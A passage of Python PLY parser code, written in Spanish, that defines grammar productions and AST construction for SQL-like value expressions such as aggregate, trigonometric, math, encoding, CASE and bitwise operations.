'VALOR : COUNT PABRE ID PUNTO ID PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \".\" \"ID\" \")\" <ALIAS>")
val_id = Id(t[5], t[3])
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7].getNodo()))
t[0] = ret
def p_ValorCountIdP(t):
'VALOR : COUNT PABRE ID PUNTO ID PCIERRA'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \".\" \"ID\" \")\"")
val_id = Id(t[3], None)
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorCondicionAlias(t):
'VALOR : CONDICION ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <CONDICION> <ALIAS>")
ret = Retorno(Valores(t[1].getInstruccion(), t[2].getInstruccion()), NodoAST('AS'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ValorCondicion(t):
'VALOR : CONDICION'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <CONDICION>")
ret = Retorno(Valores(t[1].getInstruccion(), None), t[1].getNodo())
t[0] = ret
def p_ValorFTrigonometricas(t):
'VALOR : FTRIGONOMETRICAS PABRE LNUM PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <FTRIGONOMETRICAS> \"(\" <LNUM> \")\"")
ret = Retorno(FuncionesTrigonometricas(t[1], t[3].getInstruccion(), t[1]), NodoAST('TRIGONOMETRICA'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorFTrigonometricasAlias(t):
'VALOR : FTRIGONOMETRICAS PABRE LNUM PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <FTRIGONOMETRICAS> \"(\" <LNUM> \")\" <ALIAS>")
ret = Retorno(FuncionesTrigonometricas(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('TRIGONOMETRICA'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorGreatest(t):
'VALOR : GREATEST PABRE LNUM PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GREATEST\" \"(\" <LNUM> \")\"")
ret = Retorno(FuncionGreatest(t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GREATEST'))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorLeast(t):
'VALOR : LEAST PABRE LNUM PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"LEAST\" \"(\" <LNUM> \")\"")
ret = Retorno(FuncionLeast(t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('LEAST'))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorGreatestAlias(t):
'VALOR : GREATEST PABRE LNUM PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GREATEST\" \"(\" <LNUM> \")\" <ALIAS>")
ret = Retorno(FuncionGreatest(t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GREATEST'))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorLeastAlias(t):
'VALOR : LEAST PABRE LNUM PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"LEAST\" \"(\" <LNUM> \")\" <ALIAS>")
ret = Retorno(FuncionLeast(t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('LEAST'))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0]= ret
def p_ValorRandomA(t):
'VALOR : RANDOM PABRE PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"RANDOM\" \"(\" \")\" <ALIAS>")
ret = Retorno(FuncionRandom(t[4].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('RANDOM'))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorRandom(t):
'VALOR : RANDOM PABRE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"RANDOM\" \"(\" \")\"")
ret = Retorno(FuncionRandom(t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('RANDOM'))
t[0] = ret
def p_ValorPiAlias(t):
'VALOR : PI PABRE PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"PI\" \"(\" \")\" <ALIAS>")
ret = Retorno(FuncionPi(t[4].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('PI'))
t[0] = ret
def p_ValorPi(t):
'VALOR : PI PABRE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"PI\" \"(\" \")\"")
ret = Retorno(FuncionPi(t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('PI'))
t[0] = ret
def p_ValorFuncionesDecodeA(t):
'VALOR : DECODE PABRE CADENA COMA CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"DECODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(Decode(t[3], t[5], t[7].getInstruccion), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('DECODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesDecode(t):
'VALOR : DECODE PABRE CADENA COMA CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"DECODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\"")
ret = Retorno(Decode(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('DECODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesEncodeA(t):
'VALOR : ENCODE PABRE CADENA COMA CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"ENCODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(Encode(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('ENCODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesEncode(t):
'VALOR : ENCODE PABRE CADENA COMA CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"ENCODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\"")
ret = Retorno(Encode(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('ENCODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesConvertDate(t):
'VALOR : CONVERT PABRE CADENA AS DATE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"DATE\" \")\"")
ret = Retorno(Convert(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesConvertInt(t):
'VALOR : CONVERT PABRE CADENA AS INTEGER PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"INTEGER\" \")\"")
ret = Retorno(Convert(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesConvertDateA(t):
'VALOR : CONVERT PABRE CADENA AS DATE PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"DATE\" \")\" <ALIAS>")
ret = Retorno(Convert(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesConvertIntA(t):
'VALOR : CONVERT PABRE CADENA AS INTEGER PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"INTEGER\" \")\" <ALIAS>")
ret = Retorno(Convert(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesSha(t):
'VALOR : SHA256 PABRE CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SHA256\" \"(\" \"CADENA\" \")\"")
ret = Retorno(Sha256(t[3], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SHA256'))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_ValorFuncionesShaA(t):
'VALOR : SHA256 PABRE CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SHA256\" \"(\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(Sha256(t[3], t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SHA256'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorOperadorMatAlias(t):
'VALOR : NUM OPERADOR NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <NUM> <OPERADOR> <NUM> <ALIAS>")
val = OperacionBinariaS(t[1], t[3], t[2], t[4].getInstruccion())
nodo = None
if t[2] == OPERACION_STRING.BAND:
nodo = NodoAST('&')
elif t[2] == OPERACION_STRING.BOR:
nodo = NodoAST('\\|')
elif t[2] == OPERACION_STRING.BXOR:
nodo = NodoAST('#')
elif t[2] == OPERACION_STRING.DESPLAZAI:
nodo = NodoAST('\\<\\<')
elif t[2] == OPERACION_STRING.DESPLAZAD:
nodo = NodoAST('\\>\\>')
ret = Retorno(val, nodo)
ret.getNodo().setHijo(NodoAST(str(t[1].valor)))
ret.getNodo().setHijo(NodoAST(str(t[3].valor)))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorOperadorMat(t):
'VALOR : NUM OPERADOR NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <NUM> <OPERADOR> <NUM>")
val = OperacionBinariaS(t[1], t[3], t[2], None)
nodo = None
if t[2] == OPERACION_STRING.BAND:
nodo = NodoAST('&')
elif t[2] == OPERACION_STRING.BOR:
nodo = NodoAST('\\|')
elif t[2] == OPERACION_STRING.BOR:
nodo = NodoAST('#')
elif t[2] == OPERACION_STRING.DESPLAZAI:
nodo = NodoAST('\\<\\<')
elif t[2] == OPERACION_STRING.DESPLAZAD:
nodo = NodoAST('\\>\\>')
ret = Retorno(val, nodo)
ret.getNodo().setHijo(NodoAST(str(t[1].valor)))
ret.getNodo().setHijo(NodoAST(str(t[3].valor)))
t[0] = ret
def p_ValorOperadorNotA(t):
'VALOR : BNot NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM> <ALIAS>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.BNOT, t[3].getInstruccion()), NodoAST('~'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorOperadorNot(t):
'VALOR : BNot NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.BNOT, None), NodoAST('~'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
t[0] = ret
def p_ValorRaizCuadradaA(t):
'VALOR : raizCuadrada NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM> <ALIAS>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUADRADA, t[3].getInstruccion()), NodoAST('\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorRaizCuadrada(t):
'VALOR : raizCuadrada NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUADRADA, None), NodoAST('\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
t[0] = ret
def p_ValorRaizCubicaA(t):
'VALOR : raizCubica NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM> <ALIAS>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUBICA, t[3].getInstruccion()), NodoAST('\\|\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorRaizCubica(t):
'VALOR : raizCubica NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUBICA, None), NodoAST('\\|\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
t[0] = ret
def p_ValorFuncionesGetByte(t):
'VALOR : GETBYTE PABRE CADENA COMA NUMERO PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \")\"")
ret = Retorno(GetByte(t[3], t[5], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesGetByteA(t):
'VALOR : GETBYTE PABRE CADENA COMA NUMERO PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \")\" <ALIAS>")
ret = Retorno(GetByte(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesSetByte(t):
'VALOR : SETBYTE PABRE CADENA COMA NUMERO COMA NUMERO PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \",\" \"NUMERO\" \")\"")
ret = Retorno(SetByte(t[3], t[5], t[7], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
t[0] = ret
def p_ValorFuncionesSetByteA(t):
'VALOR : SETBYTE PABRE CADENA COMA NUMERO COMA NUMERO PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \",\" \"NUMERO\" \")\" <ALIAS>")
ret = Retorno(SetByte(t[3], t[5], t[7], t[9].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_ValorCase(t):
'VALOR : CASE LWHEN END '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CASE\" <LWHEN> \"END\"")
ret = Retorno(InstruccionCase(t[2].getInstruccion(), None), NodoAST('CASE'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ValorCaseAlias(t):
'VALOR : CASE LWHEN END ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CASE\" <LWHEN> \"END\" <ALIAS>")
ret = Retorno(InstruccionCase(t[2].getInstruccion(), t[4].getInstruccion()), NodoAST('CASE'))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorFunAlias(t):
'VALOR : ID_VALOR PABRE LCONDICION_FUNCION PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <ID_VALOR> \"(\" <LCONDICION_FUNCION> \")\" <ALIAS>")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorFun(t):
'VALOR : ID_VALOR PABRE LCONDICION_FUNCION PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <ID_VALOR> \"(\" <LCONDICION_FUNCION> \")\"")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_LWHEN(t):
'LWHEN : LWHEN PWHEN '
global reporte_gramatical
reporte_gramatical.append("<LWHEN> ::= <LWHEN> <PWHEN>")
val = t[1].getInstruccion()
val.append(t[2].getInstruccion())
ret = Retorno(val, NodoAST('WHEN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_WHENWHEN(t):
'LWHEN : PWHEN'
global reporte_gramatical
reporte_gramatical.append("<LWHEN> ::= <PWHEN>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('WHEN'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_LWHENSimple(t):
'PWHEN : WHEN CONDICION THEN CONDICION '
global reporte_gramatical
reporte_gramatical.append("<PWHEN> ::= \"WHEN\" <CONDICION> \"THEN\" <CONDICION>")
val = InstruccionWhen(t[2].getInstruccion(), t[4].getInstruccion())
auxval = [val]
ret = Retorno(auxval, NodoAST('VALOR'))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_LWHENElse(t):
'PWHEN : ELSE CONDICION '
global reporte_gramatical
reporte_gramatical.append("<PWHEN> ::= \"ELSE\" <CONDICION>")
val = InstruccionElse(t[2].getInstruccion())
auxval = [val]
ret = Retorno(auxval, NodoAST('ELSE'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_IdFuncionDegrees(t):
'ID_VALOR : DEGREES '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"DEGREES\"")
t[0] = 'DEGREES'
def p_IdFuncionDiv(t):
'ID_VALOR : DIV '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"DIV\"")
t[0] = 'DIV'
def p_IdFuncionExp(t):
'ID_VALOR : FEXP '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"EXP\"")
t[0] = 'EXP'
def p_IdFuncionFactorial(t):
'ID_VALOR : FACTORIAL '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"FACTORIAL\"")
t[0] = 'FACTORIAL'
def p_IdFuncionFloor(t):
'ID_VALOR : FLOOR '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"FLOOR\"")
t[0] = 'FLOOR'
def p_IdFuncionGcd(t):
'ID_VALOR : GCD '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"GCD\"")
t[0] = 'GCD'
def p_IdFuncionLn(t):
'ID_VALOR : LN '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"LN\"")
t[0] = 'LN'
def p_IdFuncionLog(t):
'ID_VALOR : LOG '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"LOG\"")
t[0] = 'LOG'
def p_IdFuncionMod(t):
'ID_VALOR : MOD '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"MOD\"")
t[0] = 'MOD'
def p_IdFuncionPower(t):
'ID_VALOR : POWER '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"POWER\"")
t[0] = 'POWER'
def p_IdFuncionRadians(t):
'ID_VALOR : RADIANS '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"RADIANS\"")
t[0] = 'RADIANS'
def p_IdFuncionRound(t):
'ID_VALOR : ROUND '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"ROUND\"")
t[0] = 'ROUND'
def p_IdFuncionSign(t):
'ID_VALOR : SIGN '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"SIGN\"")
t[0] = 'SIGN'
def p_IdFuncionSqrt(t):
'ID_VALOR : SQRT '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"SQRT\"")
t[0] = 'SQRT'
def p_IdFuncionWidth_bucket(t):
'ID_VALOR : WIDTH_BUCKET '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"WIDTH_BUCKET\"")
t[0] = 'WIDTH_BUCKET'
def p_IdFuncionTrunc(t):
'ID_VALOR : TRUNC '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"TRUNC\"")
t[0] = 'TRUNC'
def p_OPERADORAnd(t):
'OPERADOR : BAnd '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.BAND
def p_OPERADOROr(t):
'OPERADOR : BOr '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.BOR
def p_OPERADORXor(t):
'OPERADOR : BXor '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.BXOR
def p_OPERADORDIz(t):
'OPERADOR : DesplazaI '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.DESPLAZAI
def p_OPERADORDDe(t):
'OPERADOR : DesplazaD '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.DESPLAZAD
def p_LNumNumLNum(t):
'LNUM : LNUM COMA NUM'
global reporte_gramatical
reporte_gramatical.append("<LNUM> ::= <LNUM> \",\" <NUM>")
val = t[1].getInstruccion()
val.append(t[3])
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(str(t[3].valor)))
t[0] = ret
def p_LNumNum(t):
'LNUM : NUM'
global reporte_gramatical
reporte_gramatical.append("<LNUM> ::= <NUM>")
val = [t[1]]
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(NodoAST(str(t[1].valor)))
t[0] = ret
def p_NumNumero(t):
'NUM : NUMERO '
global reporte_gramatical
reporte_gramatical.append("<NUM> ::= \"NUMERO\"")
t[0] = Numero(t[1])
def p_NumDecimal(t):
'NUM : DECIMALN '
global reporte_gramatical
reporte_gramatical.append("<NUM> ::= \"DECIMALN\"")
t[0] = Decimal(t[1])
def p_NumCadena(t):
'NUM : CADENA '
global reporte_gramatical
reporte_gramatical.append("<NUM> ::= \"CADENA\"")
t[0] = Cadena(t[1])
def p_FTrigonometricasAcos(t):
'FTRIGONOMETRICAS : ACOS '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ACOS\"")
t[0] = 'ACOS'
def p_FTrigonometricasAcosd(t):
'FTRIGONOMETRICAS : ACOSD '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ACOSD\"")
t[0] = 'ACOSD'
def p_FTrigonometricasAsin(t):
'FTRIGONOMETRICAS : ASIN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ASIN\"")
t[0] = 'ASIN'
def p_FTrigonometricasAsind(t):
'FTRIGONOMETRICAS : ASIND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ASIND\"")
t[0] = 'ASIND'
def p_FTrigonometricasAtan(t):
'FTRIGONOMETRICAS : ATAN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAN\"")
t[0] = 'ATAN'
def p_FTrigonometricasAtand(t):
'FTRIGONOMETRICAS : ATAND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAND\"")
t[0] = 'ATAND'
def p_FTrigonometricasAtan2(t):
'FTRIGONOMETRICAS : ATAN2 '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAN2\"")
t[0] = 'ATAN2'
def p_FTrigonometricasAtan2d(t):
'FTRIGONOMETRICAS : ATAN2D '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAN2D\"")
t[0] = 'ATAN2D'
def p_FTrigonometricasCos(t):
'FTRIGONOMETRICAS : COS '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COS\"")
t[0] = 'COS'
def p_FTrigonometricasCosd(t):
'FTRIGONOMETRICAS : COSD '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COSD\"")
t[0] = 'COSD'
def p_FTrigonometricasCot(t):
'FTRIGONOMETRICAS : COT '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COT\"")
t[0] = 'COT'
def p_FTrigonometricasCotd(t):
'FTRIGONOMETRICAS : COTD '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COTD\"")
t[0] = 'COTD'
def p_FTrigonometricasSin(t):
'FTRIGONOMETRICAS : SIN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"SIN\"")
t[0] = 'SIN'
def p_FTrigonometricasSind(t):
'FTRIGONOMETRICAS : SIND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"SIND\"")
t[0] = 'SIND'
def p_FTrigonometricasTan(t):
'FTRIGONOMETRICAS : TAN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"TAN\"")
t[0] = 'TAN'
def p_FTrigonometricasTand(t):
'FTRIGONOMETRICAS : TAND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"TAND\"")
t[0] = 'TAND'
def p_FTrigonometricasSinh(t):
'FTRIGONOMETRICAS : SINH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"SINH\"")
t[0] = 'SINH'
def p_FTrigonometricasCosh(t):
'FTRIGONOMETRICAS : COSH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COSH\"")
t[0] = 'COSH'
def p_FTrigonometricasTanh(t):
'FTRIGONOMETRICAS : TANH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"TANH\"")
t[0] = 'TANH'
def p_FTrigonometricasAsinh(t):
'FTRIGONOMETRICAS : ASINH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ASINH\"")
t[0] = 'ASINH'
def p_FTrigonometricasAcosh(t):
'FTRIGONOMETRICAS : ACOSH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ACOSH\"")
t[0] = 'ACOSH'
def p_FTrigonometricasAtanh(t):
'FTRIGONOMETRICAS : ATANH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATANH\"")
t[0] = 'ATANH'
def p_funcionAvg(t):
'FUNCION : AVG'
def p_funcionSum(t):
'FUNCION : SUM'
def p_funcionMin(t):
